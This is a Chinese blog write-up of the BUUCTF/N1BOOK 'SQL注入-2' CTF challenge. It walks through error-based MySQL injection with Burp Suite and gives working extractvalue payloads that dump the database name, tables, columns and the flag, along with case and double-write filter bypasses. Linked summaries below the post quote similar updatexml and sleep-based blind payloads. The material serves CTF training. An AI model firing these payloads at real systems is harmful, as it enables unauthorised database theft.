[第一章 web入门]SQL注入-2 题目分析与详解

于 2024-02-26 21:00:10 发布
阅读量888 收藏 12
点赞数 5
分类专栏: BUUCTF 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79800344/article/details/136307671
版权

一、题目简介

分析题目,拿到flag。

二、解题思路

1、我们首先按照题目要求,分别访问 /login.php 和 /user.php。

访问 /login.php,页面如图:

访问 user.php,页面如图:

user.php没有用处,我们对 login.php 进行分析。

2、我们查看页面源代码,看看是否能找到有用的信息。

页面源代码给出我们两处提示:

(1)在url的后面加入 ?tips=1来开启mysql的错误提示,错误提示=报错会进行回显,那么可以使用报错注入,提供了一种思路。

(2)利用Burpsuite进行发包,提示我们最好在Burpsuite中进行操作。

那么我们就通过页面源代码的提示进行解题。

3、我们首先利用 Burp suite 对其进行抓包,并在url后面加上 tips=1,并且发送至 repeater 模块,方便实时发包查看报错信息。

具体报错信息可以使用 unicode编码在线转化工具转换为中文。

4、首先判断注入类型:

(1)name=123&pass=123,回显是\u8d26\u53f7\u4e0d\u5b58\u5728,unicode解码就是账号不存在。
(2)name=admin&pass=123,回显是\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef,解码就是账号或密码错误。

这就可以证明账号 admin是存在的,那么注入类型为 字符型注入。

经过和报错注入的联合判断,我们可以得出闭合方式为:单引号 ' 。

接下俩进行报错注入:

(1)注出数据库库名:

1' and extractvalue(1,concat(0x7e,database()))--+

(2)注出数据库中的表名:

admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))--+

 

我们发现未能注出表明,可能是select关键字被过滤掉了,那么我们利用大小写绕过,将select写作Select。 双写绕过 selselectect也是OK的。

admin' and extractvalue(1,concat(0x7e,(Select group_concat(table_name)from information_schema.tables where table_schema=database())))--+

 

成功注出表明,发现一张名叫作 fl4g 的表,flag很有可能就在这张表里。

(3)注出表 fl4g 中的列:

admin'and extractvalue(1,concat(0x7e,(Select group_concat(column_name)from information_schema.columns where table_name='fl4g'))) --+

 

 发现字段 flag,flag就在字段flag中。

(4)注出flag的值:

admin'and extractvalue(1,concat(0x7e,(Select flag from fl4g))) --+

 

 

成功拿到了flag。 

 

 

给我杯冰美式
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB入门——SQL注入(二)
HasntStartIsOver的博客
06-03 322
二次注入和绕过
Web入门Sql注入(二)
qq_51459823的博客
11-16 1082
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
[第一章 web入门]SQL注入-2
weixin_40546436的博客
07-23 1070
1 通过updatexml取数据 从页面发现有一个提示 如果加上?tips=1的话,通过burpsuite发包可以通过updatexml来查看回显,可以通过这个取到数据 下面是通过updatexml来注入,这时4步中用到语句 name=admin’ and updatexml(1,concat(0x7e,(select(database())),0x7e),1) #&pass=bb name=admin’ and updatexml(1,concat(0x7e,(selEct(group_conc
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4973
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
第5章 5.WEB安全性测试--SQL注入一.mp4
05-08
第5章 5.WEB安全性测试--SQL注入一.mp4
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
第8章 8.WEB安全性测试--SQL注入四.mp4
05-08
第8章 8.WEB安全性测试--SQL注入四.mp4
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2525
分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 892
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2
satasun的博客
12-13 2123
概述 本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。 解法一:基于时间 直接在前端进行注入的话没有报错回显,所以需要抓个包然后开始测试。 测库名 首先测试库名长度 name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd 等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试) 然后测试
web安全之SQL注入---第二章 什么是sql注入
weixin_33863087的博客
08-21 84
如何理解SQL注入SQL注入是一种将SQL代码添加到输入参数中传递到SQL服务器解析并执行的一种攻击方法总结:其实就是输入的参数没有进行过滤,直接参加sql语句的运算,达到不可预想的结果。SQL注入是怎么产生的?1.web开发人员无法保证所有的输入都已经过滤2.攻击者利用发送给SQL服务器的输入数据构造可执行的代码3.数据库未做相应的安全配置 转载于:https://www.cnblogs.co...
SQL注入2
ppbgi的博客
03-10 246
一、常见的注入方式: 报错注入: 报错思路: 使用各类函数使得数据库抛出异常或错误来获取数据的目的; 常见的报错注入: 1、extractvalue() 2、floor() 3、updataxml() 4、exp() 5、geometrycollection() 6、multipoint() 7、polygon() 8、multipolygon() 9、linestring() 10、multilinestring() 报错的原理: 1、BIGINT等数据类型的溢出 2、xpath语法
[web入门]SQL注入-2
1tachi的博客
12-02 611
请原谅我发出一点不友好的声音: 每个人无论是做完题了,还是没做完题,他只要是想进步,都会搜一下WP,尤其是BUUCTF的WP更有必要搜一下,为的是更标准、更多的思路,不成想我搜索发现,清一色! 思路一摸一样,用的函数一模一样,更甚之有的连思路都没有,上来就报错注入,生怕别人不知道他是抄的wp。。。令人无语! 我写的这个是我自己的思路,权当是留作笔记吧,或者是一点不健康的牢骚。。。 ...
N1BOOK第六关摸鱼:[第一章 web入门]SQL注入-2
weixin_45571987的博客
12-04 3934
BUUCTF:[第一章 web入门]SQL注入-2打开题目,寻找解题线索开始解题得到回显开始注入题目原理 打开题目,寻找解题线索   直接打开链接页面如下,我们按提示分别访问/login.php 和 /user.php 去看看   进入页面后习惯性地查看源代码发现有一行注释提示,告诉我们:可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦   另一个页面则就只有一行 login first 开始解题 得到回显   此时我们打开burp进行抓包(没有安装burp的兄
N1BOOK第三关摸鱼:[第一章 web入门]SQL注入-1
weixin_45571987的博客
11-30 3187
BUUCTF:[第一章 web入门]SQL注入-1寻找注入点尝试注入测试有几个回显开始查库查表查字段flag 寻找注入点   由域名和题目的名字可以知道咱们这道题需要尝试对它进行SQL注入http://554314db-43b4-4f9d-b9bb-b6089db353a1.node3.buuoj.cn/index.php?id=1 ?id=1’ and 1=2 页面出现错误,说明存在注入点 id 尝试注入 测试有几个回显 ?id=1’ order by3 --+ 页面正常 ?id=1’ order
[第一章 web入门]sql注入-2
最新发布
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来保护数据库的安全。在开发过程中,我们也需要注意代码的安全性,避免出现SQL注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值